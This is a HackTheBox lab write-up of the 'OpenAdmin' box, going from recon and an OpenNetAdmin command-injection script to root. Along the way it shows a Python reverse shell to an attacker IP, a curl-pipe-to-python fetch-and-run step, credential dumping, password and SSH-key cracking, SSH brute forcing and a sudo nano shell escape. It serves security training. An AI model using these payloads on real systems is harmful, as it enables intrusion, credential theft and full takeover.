An easy Linux box from HackTheBox, using an exposed admin panel for initial access, then pivoting around between users, until getting root with an SUID binary.

Open Admin

Recon

Starting with nmap

nmap -sV -sC -oA initial 10.10.10.171

PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)  
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)  
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)  
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))  
|_http-title: Apache2 Ubuntu Default Page: It works  
|_http-server-header: Apache/2.4.29 (Ubuntu)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Also running an allports scan with -p- option in the background as I worked on the box, but nothing new was shown

Searching for Apache 2.4.29 on launchpad, find that the box is relatively new, Ubuntu Bionic

Navigating to the HTTP server on port 80, all that it shows is the default Apache page

Welp, lets hit it with gobuster

gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Find a few interesting directories, /music, /artwork and /sierra

Of these three, /music has a login button, that immediately dumps you into an administrator panel called OpenNetAdmin

Exploitation

For this particular version, there is a command injection exploit abusing the systems ping functionality

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

The above script (when executed and providing the URL, and the command you want to inject), will execute it on the server

Starting up a netcat session on port 1234, the payload will be a reverse shell

Copying the exploit into ona_inject.sh, but append a -x \http://127.0.0.1:8080 to the curl call to send the exploit’s curl to Burp Proxy (just to make sure its working)

#!/bin/bash  
  
URL="${1}"  
while true;do  
echo -n "$ "; read cmd  
curl -x 'http://127.0.0.1:8080' --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[  
]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2  
| head -n -1  
done

And run it like so

./ona_inject.sh 10.10.10.171/ona/

Really weird box, hard to get reverse shell on it

Need to use this python reverse shell (minus the python -c at the front), saved into a file (called rev.py)

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Curl it from the server using a simple HTTP server, and then pipe it into python3 serverside

curl 10.10.14.3:8000/rev.py | python3

Run linPEAS.sh by wget’ing it from a simple HTTP server, don’t really find anything besides 2 user names, jimmy and joanne

Looking at the config files in the /opt/ona/www/ directory recursively with grep -R, find a file called database_settings.inc.php which leaks the mySQL user and password

'db_login' => ona_sys
'db_passwd' => n1nj4W4rri0R!

And login to the mySQL instance

mysql -u ona_sys -p

Running show databases

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ona_default        |
+--------------------+
2 rows in set (0.00 sec)

Navigating into ona_default

use ona_default;

show tables;

There is a user table, when running “describe users;”

+----------+------------------+------+-----+-------------------+-----------------------------+
| Field    | Type             | Null | Key | Default           | Extra                       |
+----------+------------------+------+-----+-------------------+-----------------------------+
| id       | int(10) unsigned | NO   | PRI | NULL              | auto_increment              |
| username | varchar(32)      | NO   | UNI | NULL              |                             |
| password | varchar(64)      | NO   |     | NULL              |                             |
| level    | int(4)           | NO   |     | 0                 |                             |
| ctime    | timestamp        | NO   |     | CURRENT_TIMESTAMP | on update CURRENT_TIMESTAMP |
| atime    | datetime         | YES  |     | NULL              |                             |
+----------+------------------+------+-----+-------------------+-----------------------------+

Then printing the user info with “select id,username,password from users;”

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |
|  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+

Running the hashes into hash.org, get the creds

guest:test admin:admin

But these are just creds for the OpenNetAdmin instance

Lets try and combine all the passwords we have into a list and try each password on each of the known users

Passwords: admin test n1nj4W4rri0R!

Users: jimmy joanna root

Using a tool called medusa, lets try to ssh into the box as each user

medusa -h 10.10.10.171 -U users.txt -P pass.txt -M ssh 10.10.10.171

We get in as jimmy!

jimmy:n1nj4W4rri0R! is his creds

Looking into the (previously locked to us) home directory its empty, bummer

Lets try finding all the files owned by jimmy with

find / -user jimmy 2>/dev/null

Find some curious php scripts, one called main.php in /var/www/internal/

Cat’ing it, find that it just grabs the ssh key of joanna

Maybe there is another webserver running?

ln -lntp

Find there is a process listening on port 52846 only accepting queries from localhost

So to see joanna’s ssh key, need to run the php script with curl from jimmy

curl 127.0.0.1:52846/main.php

And it prints the ssh key out - unfortunately, there is a passphrase required for the key when you try to ssh into the box as joanna

Gotta crack it with john

#now, we will create a hash using it
python ssh2john.py joanna_id_rsa > joanna_id_rsa.hash

Finally, let’s use john and rockyou.txt to try and crack the SSH Key.

john joanna_id_rsa.hash -wordlist=rockyou.txt

The passphrase is “bloodninjas”

Now can ssh in as joanna, and find the user flag

Running sudo -l, find that joanna can run /bin/nano and have full priveleges to /opt/priv without a password

Looking at GTFObins, can get a shell through nano, by editing the only file that you can run sudo on /opt/priv

sudo /bin/nano /opt/priv

Then using the GTFObins instructions in nano

nano
^R^X
reset; sh 1>&0 2>&0

ANd you’re root!